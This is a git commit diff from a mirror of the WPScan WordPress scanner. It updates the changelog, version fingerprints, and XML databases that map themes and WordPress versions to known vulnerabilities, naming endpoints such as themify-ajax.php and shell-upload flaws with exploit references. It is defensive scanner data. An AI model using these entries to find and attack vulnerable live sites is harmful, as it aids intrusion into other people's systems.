garfield/wpscan
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Fix git merge problem

Browse Source
This commit is contained in:
Peter
2014-04-27 15:32:10 +02:00
parent e52e82fb78 59225a4b9c
commit 516ae6b68c
32 changed files with 3981 additions and 546 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
.travis.yml
View File

@@ -4,7 +4,8 @@ rvm:
- 1.9.3
- 2.0.0
- 2.1.0
- 2.1.1
script: bundle exec rspec --format documentation
notifications:
email:
- wpscanteam@gmail.com
- wpscanteam@gmail.com

65
CHANGELOG.md
View File

@@ -1,6 +1,61 @@
# Changelog
## Master
[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.3...master)
[Work in progress](https://github.com/wpscanteam/wpscan/compare/2.4...master)
## Version 2.4
Released: 2014-04-17
New
* '--batch' switch option added - Fix #454
* Add random-agent
* Added more CLI options
* Switch over to nist - Fix #301
* New choice added when a redirection is detected - Fix #438
Removed
* Removed 'Total WordPress Sites in the World' counter from stats
* Old wpscan repo links removed - Fix #440
* Fingerprinting Dev script removed
* Useless code removed
General core
* Rspecs update
* Forcing Travis notify the team
* Ruby 2.1.1 added to Travis
* Equal output layout for interaction questions
* Only output error trace if verbose if enabled
* Memory improvements during wp-items enumerations
* Fixed broken link checker, fixed some broken links
* Couple more 404s fixed
* Themes & Plugins list updated
WordPress Fingerprints
* WP 3.8.2 & 3.7.2 Fingerprints added - Fix #448
* WP 3.8.3 & 3.7.3 fingerprints
* WP 3.9 fingerprints
Fixed issues
* Fix #380 - Redirects in WP 3.6-3.0
* Fix #413 - Check the version of the Timthumbs files found
* Fix #429 - Error WpScan Cache Browser
* Fix #431 - Version number comparison between '2.3.3' and '0.42b'
* Fix #439 - Detect if the target goes down during the scan
* Fix #451 - Do not rely only on files in wp-content for fingerprinting
* Fix #453 - Documentation or inplemention of option parameters
* Fix #455 - Fails with a message if the target returns a 403 during the wordpress check
Vulnerabilities
* Update WordPress Vulnerabilities
* Fixed some duplicate vulnerabilities
WPScan Database Statistics:
* Total vulnerable versions: 79; 1 is new
* Total vulnerable plugins: 748; 55 are new
* Total vulnerable themes: 292; 41 are new
* Total version vulnerabilities: 617; 326 are new
* Total plugin vulnerabilities: 1162; 146 are new
* Total theme vulnerabilities: 330; 47 are new
## Version 2.3
Released: 2014-02-11
@@ -12,7 +67,7 @@ New
* New spell checker!
* Added database modification dates in status report
* Added 'Total WordPress Sites in the World' statistics
* Added separator between Name and Version in Item
* Added separator between Name and Version in Item
* Added a "Work in progress" URL in the CHANGELOG
Removed
@@ -44,7 +99,7 @@ WPScan Database Statistics:
* Total plugin vulnerabilities: 1016; 236 are new
* Total theme vulnerabilities: 283; 79 are new
Add WP Fingerprints
WordPress Fingerprints
* Better fingerprints
* WP 3.8.1 Fingerprinting
* WP 3.8 Fingerprinting
@@ -53,10 +108,10 @@ Fixed issues
* Fix #404 - Brute forcing issue over https
* Fix #398 - Removed a fake vuln in WP Super Cache
* Fix #393 - sudo added to the bundle install cmd for Mac OSX
* Fix #228, #327 - Infinite loop when self-redirect
* Fix #228, #327 - Infinite loop when self-redirect
* Fix #201 - Incorrect Paramter Parsing when no url was supplied
## Version 2.2
## Version 2.2
Released: 2013-11-12
New

1
README
View File

@@ -82,7 +82,6 @@ ryandewhurst at gmail
- Typhoeus segmentation fault:
Update cURL to version => 7.21 (may have to install from source)
See http://code.google.com/p/wpscan/issues/detail?id=81
- Proxy not working:
Update cURL to version => 7.21.7 (may have to install from source).

1
README.md
View File

@@ -90,7 +90,6 @@ Apple Xcode, Command Line Tools and the libffi are needed (to be able to install
- Typhoeus segmentation fault
Update cURL to version => 7.21 (may have to install from source)
See http://code.google.com/p/wpscan/issues/detail?id=81
- Proxy not working

870
data/plugin_vulns.xml
View File

File diff suppressed because it is too large Load Diff

682
data/plugins.txt
View File

File diff suppressed because it is too large Load Diff

1454
data/plugins_full.txt
View File

File diff suppressed because it is too large Load Diff

512
data/theme_vulns.xml
View File

@@ -93,6 +93,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>vithy - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="appius">
@@ -110,6 +117,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>appius - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="yvora">
@@ -144,6 +158,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>Shotzz - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="dagda">
@@ -154,6 +175,13 @@
</references>
<type>UPLOAD</type>
</vulnerability>
<vulnerability>
<title>dagda - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125827/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="moneymasters">
@@ -534,6 +562,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -584,6 +613,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -594,6 +624,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -614,6 +645,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -624,6 +656,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -634,6 +667,7 @@
<url>http://packetstormsecurity.org/files/114750/</url>
</references>
<type>UNKNOWN</type>
<fixed_in>2.0</fixed_in>
</vulnerability>
</theme>
@@ -1811,12 +1845,20 @@
<theme name="archin">
<vulnerability>
<title>Archin - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
<title>Archin 3.2 - Cross-Site Scripting and Arbitrary File Upload Vulnerabilities</title>
<references>
<secunia>50711</secunia>
</references>
<type>MULTI</type>
</vulnerability>
<vulnerability>
<title>Archin 3.2 - hades_framework/option_panel/ajax.php Configuration Option Manipulation</title>
<references>
<osvdb>86991</osvdb>
<exploitdb>21646</exploitdb>
</references>
<type>RCE</type>
</vulnerability>
</theme>
<theme name="purity">
@@ -1899,6 +1941,13 @@
</references>
<type>XSS</type>
</vulnerability>
<vulnerability>
<title>felici - Custom Background Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125830/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="classic">
@@ -1947,7 +1996,7 @@
<vulnerability>
<title>Xss In wordpress ambience theme</title>
<references>
<url>http://packetstorm.igor.onlinedirect.bg/1306-exploits/wpambience-xss.txt</url>
<url>http://www.websecuritywatch.com/wordpress-ambience-xss/</url>
</references>
<type>XSS</type>
</vulnerability>
@@ -2564,7 +2613,7 @@
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="OptimizePress">
<vulnerability>
<title>OptimizePress - File Upload Vulnerability</title>
@@ -2580,7 +2629,7 @@
</vulnerability>
</theme>
<theme name="Blooog-v1.1">
<theme name="blooog">
<vulnerability>
<title>Blooog 1.1 - jplayer.swf Cross Site Scripting</title>
<references>
@@ -3023,4 +3072,459 @@
</vulnerability>
</theme>
<theme name="Realestate">
<vulnerability>
<title>Real Estate - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="dailydeal">
<vulnerability>
<title>Dailydeal - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="nightlife">
<vulnerability>
<title>Nightlife - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="5star">
<vulnerability>
<title>5star - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="specialist">
<vulnerability>
<title>Specialist - Templatic Theme CSRF File Upload Vulnerability</title>
<references>
<url>http://1337day.com/exploit/22091</url>
</references>
<type>CSRF</type>
</vulnerability>
</theme>
<theme name="flatshop">
<vulnerability>
<title>Flatshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="magazine">
<vulnerability>
<title>Magazine - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="parallax">
<vulnerability>
<title>Parallax - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="bold">
<vulnerability>
<title>Bold - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="metro">
<vulnerability>
<title>Metro - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="pinshop">
<vulnerability>
<title>Pinshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="agency">
<vulnerability>
<title>Agency - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="slide">
<vulnerability>
<title>Slide - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="postline">
<vulnerability>
<title>Postline - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="fullscreen">
<vulnerability>
<title>Fulscreen - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="shopo">
<vulnerability>
<title>Shopo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="minshop">
<vulnerability>
<title>Minshop - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="notes">
<vulnerability>
<title>Notes - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="shopdock">
<vulnerability>
<title>Shopdock - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="phototouch">
<vulnerability>
<title>Phototouch - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="basic">
<vulnerability>
<title>Basic - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="responz">
<vulnerability>
<title>Responz - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="simfo">
<vulnerability>
<title>Simfo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="grido">
<vulnerability>
<title>Grido - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="tisa">
<vulnerability>
<title>Tisa - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="funki">
<vulnerability>
<title>Funki - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="minblr">
<vulnerability>
<title>Minblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="newsy">
<vulnerability>
<title>Newsy - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="wumblr">
<vulnerability>
<title>Wumblr - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="rezo">
<vulnerability>
<title>Rezo - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="photobox">
<vulnerability>
<title>Photobox - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="edmin">
<vulnerability>
<title>Edmin - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="koi">
<vulnerability>
<title>Koi - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="bizco">
<vulnerability>
<title>Bizco - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="thememin">
<vulnerability>
<title>Thememin - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="wigi">
<vulnerability>
<title>Wigi - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="sidepane">
<vulnerability>
<title>Sidepane - themify-ajax.php File Upload Arbitrary Code Execution</title>
<references>
<osvdb>100271</osvdb>
<url>http://packetstormsecurity.com/files/124097/</url>
<url>http://1337day.com/exploit/22090</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="Sixtees">
<vulnerability>
<title>Sixtees - Shell Upload</title>
<references>
<url>http://packetstormsecurity.com/files/125491/</url>
</references>
<type>UPLOAD</type>
</vulnerability>
</theme>
<theme name="linenity">
<vulnerability>
<title>LineNity 1.20 - download.php imgurl Parameter Remote Path Traversal File Access</title>
<references>
<osvdb>105767</osvdb>
<exploitdb>32861</exploitdb>
</references>
<type>LFI</type>
</vulnerability>
</theme>
</vulnerabilities>

186
data/themes.txt
View File

@@ -1,27 +1,28 @@
academica
activetab
aadya
abaris
adamos
adaptive-flat
adelle
admired
adventure
advertica-lite
albinomouse
aldehyde
alexandria
analytical-lite
anarcho-notepad
andrina-lite
appointment
aquarius
ascetica
apprise
arcade-basic
arunachala
aspen
asteria-lite
asteroid
atahualpa
attitude
autofocus
base-wp
beach
bearded
bicubic
birdsite
big-city
bizantine
bizark
bizflare
@@ -31,270 +32,267 @@ bizsphere
bizstudio-lite
bizway
blackbird
blain
blankslate
blogbox
blogly-lite
blogolife
blogotron
blox
blue-planet
bluegray
boldr-lite
boot-store
bootstrap-ultimate
bota
bouquet
bresponzive
brightnews
bueno
bushwick
business-lite
busiprof
butterbelly
buzz
byblos
carton
capture
catch-box
catch-everest
catch-evolution
catch-kathmandu
celestial-lite
chaostheory
childishly-simple
chooko-lite
church
cirrus
clean-retina
cleo
coller
colorway
contango
coraline
corpo
crates
current
custom-community
customizr
cyberchimps
d5-socialia
dark-tt
dazzling
decode
designfolio
desk-mess-mirrored
destro
discover
dms
drop
duena
dusk-to-dawn
duster
dw-minion
dw-timeline
dw-wallpress
dzonia-lite
eclipse
elisium
elegantwhite
elmax
engrave-lite
enough
envision
epic
esell
esplanade
esquire
estate
evolve
expert
expound
family
fashionistas
fastr
figero
fifteen
fine
firmasite
fixy
flounder
flat
focus
forestly
forever
formidable-restaurant
frau
formation
fresh-lite
frisco-for-buddypress
frontier
fruitful
future
gamepress
gold
golden-eagle-lite
govpress
graphene
graphy
gridbulletin
gridiculous
gridster-lite
hatch
hazen
hero
health-center-lite
hemingway
highwind
hueman
hypnotist
i-transform
iconic-one
ifeature
imprint
independent-publisher
infinite
infoway
inkness
inkzine
intuition
invert-lite
irex-lite
iribbon
isis
journalism
itek
justwrite
kavya
klasik
leatherdiary
leniy-radius
limelight
lizardbusiness
local-business
lugada
magazine-basic
lingonberry
linia-magazine
luminescence-lite
lupercalia
magazine-style
magazino
mantra
market
match
matheson
max-magazine
maxflat-core
meadowhill
medicine
mesocolumn
mh-magazine-lite
ming
midnightcity
minimatica
minimize
mn-flow
modern-estate
monaco
montezuma
multiloquent
mywiki
neuro
neutro
newdark
newlife
newp
newtek
newgamer
newpro
next-saturday
nictitate
omega
one-page
onecolumn
onetone
openstrap
opulus-sombre
origami
origin
oxygen
p2
padhang
pagelines
parabola
parallax
parament
phonix
photolistic
piedmont
pilcrow
pilot-fish
pinbin
pinboard
pink-touch-2
pitch
platform
point
portfolio-press
pr-pin
pr-news
preference-lite
preus
primo-lite
privatebusiness
promax
quark
radiant
radiate
raindrops
rambo
raptor
raven
ready-review
reddle
redify
reizend
response
redesign
responsive
restaurante
restaurateur
restimpo
retention
reviewgine-affiliate
ridizain
rtpanel
rundown
sampression-lite
semper-fi-lite
sensitive
sequel
serene
shopping
sigma
silverclean-lite
simple-catch
simpleo
simplicity-lite
simply-vision
singl
sixteen
skt-full-width
sliding-door
smpl-skeleton
snaps
snapshot
sorbet
sneak-lite
socialize-lite
spacious
spartan
spasalon
sporty
spun
stairway
stargazer
startupwp
start-point
steira
strapvert
storefront-paper
story
suevafree
suffusion
sugar-and-spice
suits
sukelius-magazine
sundance
sunny-blue-sky
sunrain
sunspot
superhero
supernova
surfarama
swift-basic
syntax
tanzanite
teal
techism
tempera
temptation
terrifico
the-falcon
the-newswire
thematic
themia-lite
theron-lite
tiga
timeturner
tiny-forge
tonal
tonic
travel-blogger
travel-lite
travelify
twentyeleven
twentyfourteen
twentyten
twentythirteen
twentytwelve
typal-makewp005
unite
untitled
uu-2014
vantage
venom
viper
virtue
voyage
vision
visitpress
visual
vryn-restaurant
ward
weaver-ii
weavr
wiziapp-smooth-touch
wordplus
wp-advocate
wp-barrister
wilson
wp-creativix
wp-opulus
wp-simple
wpchimp-countdown
writr
x2
yoko
zalive
zbench
zeebizzcard
zeebusiness
zeedynamic
zeeflow
zeefocus
zeeminty
zeenoble
zeestyle
zeesynergie
zeetasty
zenon-lite

315
data/themes_full.txt
View File

File diff suppressed because it is too large Load Diff

1
data/timthumbs.txt
View File

@@ -115,6 +115,7 @@ $wp-plugins$/islidex/js/timthumb.php
$wp-plugins$/islidex/js/timthumb.phpthumb.php
$wp-plugins$/islidex/js/timthumb.phptimthumb.php
$wp-plugins$/jquery-slider-for-featured-content/scripts/timthumb.php
$wp-plugins$/js-multihotel/includes/timthumb.php
$wp-plugins$/kc-related-posts-by-category/timthumb.php
$wp-plugins$/kino-gallery/timthumb.php
$wp-plugins$/lisl-last-image-slider/timthumb.php

1
data/vuln.xsd
View File

@@ -40,6 +40,7 @@
<xs:enumeration value="CSRF"/>
<xs:enumeration value="SSRF"/>
<xs:enumeration value="AUTHBYPASS"/>
<xs:enumeration value="BYPASS"/>
<xs:enumeration value="FPD"/>
<xs:enumeration value="XXE"/>
</xs:restriction>

63
data/wp_versions.xml
View File

@@ -10,16 +10,68 @@
<wp-versions xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="wp_versions.xsd">
<file src="wp-includes/css/buttons-rtl.css">
<hash md5="fb062ed92b76638c161e80f4a5426586">
<file src="readme.html">
<hash md5="84b54c54aa48ae72e633685c17e67457">
<version>3.9</version>
</hash>
<hash md5="c6de8fc70a18be7e5c36198cd0f99a64">
<version>3.8.3</version>
</hash>
<hash md5="e01a2663475f6a7a8363a7c75a73fe23">
<version>3.8.2</version>
</hash>
<hash md5="0d0eb101038124a108f608d419387b92">
<version>3.8.1</version>
</hash>
<hash md5="38ee273095b8f25b9ffd5ce5018fc4f0">
<version>3.8</version>
</hash>
<hash md5="813e06052daa0692036e60d76d7141d3">
<version>3.7.3</version>
</hash>
<hash md5="b3a05c7a344c2f53cb6b680fd65a91e8">
<version>3.7.2</version>
</hash>
<hash md5="e82f4fe7d3c1166afb4c00856b875f16">
<version>3.6.1</version>
</hash>
<hash md5="477f1e652f31dae76a38e3559c91deb9">
<version>3.6</version>
</hash>
<hash md5="caf7946275c3e885419b1d36b22cb5f3">
<version>3.5.2</version>
</hash>
<hash md5="05d50a04ef19bd4b0a280362469bf22f">
<version>3.5.1</version>
</hash>
<hash md5="066cfc0f9b29ae6d491aa342ebfb1b71">
<version>3.5</version>
</hash>
<hash md5="36b2b72a0f22138a921a38db890d18c1">
<version>3.3.3</version>
</hash>
<hash md5="628419c327ca5ed8685ae3af6f753eb8">
<version>3.3.2</version>
</hash>
<hash md5="c1ed266e26a829b772362d5135966bc3">
<version>3.3.1</version>
</hash>
<hash md5="9ea06ab0184049bf4ea2410bf51ce402">
<version>3.0</version>
</hash>
</file>
<file src="wp-includes/css/buttons-rtl.css">
<hash md5="d24d1d1eb3a4b9a4998e4df1761f8b9e">
<version>3.9</version>
</hash>
<hash md5="71c13ab1693b45fb3d7712e540c4dfe0">
<version>3.8</version>
</hash>
</file>
<file src="wp-includes/js/tinymce/wp-tinymce.js.gz">
<!-- Note: 3.7.1 has no unique file (the hash below is the same than the 3.7.2) -->
<hash md5="44d281b0d84cc494e2b095a6d2202f4d">
<version>3.7.1</version>
</hash>
@@ -64,13 +116,6 @@
</hash>
</file>
<file src="$wp-content$/themes/twentyeleven/style.css">
<!-- same md5 for 3.3.2 -->
<hash md5="030d3bac906ba69e9fbc99c5bac54a8e">
<version>3.3.1</version>
</hash>
</file>
<file src="wp-admin/js/common.js">
<hash md5="4516252d47a73630280869994d510180">
<version>3.3</version>

170
data/wp_vulns.xml
View File

@@ -3,6 +3,46 @@
<vulnerabilities xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="vuln.xsd">
<wordpress version="3.8.1">
<vulnerability>
<title>Administrator-exploitable blind SQLi in WordPress 1.0 - 3.8.1</title>
<references>
<url>https://security.dxw.com/advisories/sqli-in-wordpress-3-6-1/</url>
</references>
<type>SQLI</type>
</vulnerability>
<vulnerability>
<title>Potential Authentication Cookie Forgery</title>
<references>
<osvdb>105620</osvdb>
<url>https://labs.mwrinfosecurity.com/blog/2014/04/11/wordpress-auth-cookie-forgery/</url>
<url>https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be</url>
<cve>2014-0166</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Privilege escalation: contributors publishing posts</title>
<references>
<osvdb>105630</osvdb>
<url>https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165</url>
<cve>2014-0165</cve>
</references>
<type>BYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>105622</osvdb>
<secunia>57769</secunia>
</references>
<type>BYPASS</type>
<fixed_in>3.8.2</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.8">
<vulnerability>
<title>wp-admin/options-writing.php Cleartext Admin Credentials Disclosure</title>
@@ -15,6 +55,26 @@
</wordpress>
<wordpress version="3.7.1">
<vulnerability>
<title>Potential Authentication Cookie Forgery</title>
<references>
<osvdb>105620</osvdb>
<url>https://github.com/WordPress/WordPress/commit/78a915e0e5927cf413aa6c2cef2fca3dc587f8be</url>
<cve>2014-0166</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
<vulnerability>
<title>Privilege escalation: contributors publishing posts</title>
<references>
<osvdb>105630</osvdb>
<url>https://github.com/wpscanteam/wpscan/wiki/CVE-2014-0165</url>
<cve>2014-0165</cve>
</references>
<type>BYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
<vulnerability>
<title>wp-admin/options-writing.php Cleartext Admin Credentials Disclosure</title>
<references>
@@ -23,6 +83,15 @@
</references>
<type>AUTHBYPASS</type>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>105622</osvdb>
<secunia>57769</secunia>
</references>
<type>BYPASS</type>
<fixed_in>3.7.2</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.6">
@@ -288,6 +357,30 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Shortcodes / Post Content Multiple Unspecified XSS</title>
<references>
<osvdb>89576</osvdb>
<cve>2013-0236</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57554</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4.2">
@@ -352,6 +445,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
